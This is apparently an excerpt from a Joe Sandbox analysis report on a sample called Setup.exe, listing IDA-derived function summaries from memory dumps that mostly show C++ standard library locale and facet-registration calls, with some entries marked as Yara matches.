                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFAE2
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFAEC
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AFB26
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFB3D
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFB5D
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFB6A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF9B8
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF9C2
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AF9FC
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFA13
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFA33
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFA40
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFE60
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFE6A
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 031AFEA4
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFEBB
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFEDB
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFEE8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D612C6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D612D0
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6130A
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61321
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61341
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6134E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61231
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6123B
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D61275
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6128C
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D612AC
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D612B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6135B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61365
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6139F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D613B6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D613D6
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D613E3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D61644
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6164E
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 02D61688
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6169F
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D616BF
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D616CC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CB0D
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CB17
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 02D6CB51
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CB68
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CB88
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CB95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CCCC
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CCD6
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6CD10
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CD27
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CD47
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CD54
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CD61
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CD6B
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 02D6CDA5
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CDBC
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CDDC
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CDE9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3DF43
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3DF5D
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3E18A
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 02D3E1A4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                      • String ID: @PIT6I
                                                                                                                                                                                                                                                      • API String ID: 4194217158-2369559966
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\Desktop\Setup.exe, xrefs: 031CFEC9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                      • API String ID: 0-2320538190
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Maklocchr$H_prolog3_
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 21007340-2658103896
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D7BC
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D7DE
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D806
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0319D8EE
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D922
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4EFA0
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4EFC2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4EFEA
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D4F0D2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4F106
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0318A8AD
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0318A8CF
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0318A8F7
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0318A9F1
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0318AA25
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D15D
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D17F
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D1A7
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0319D294
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D2C8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4E941
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4E963
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4E98B
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D4EA78
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4EAAC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AA553
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AA55D
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AA604
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AA60F
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AA61C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 845066630-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5BD37
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D5BD41
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D5BDE8
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D5BDF3
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5BE00
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 845066630-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5BBF2
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D5BBFC
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D5BC4D
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D5BC6D
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D5BC7A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AA40E
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AA418
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AA469
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AA489
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AA496
                                                                                                                                                                                                                                                      Memory Dump Source
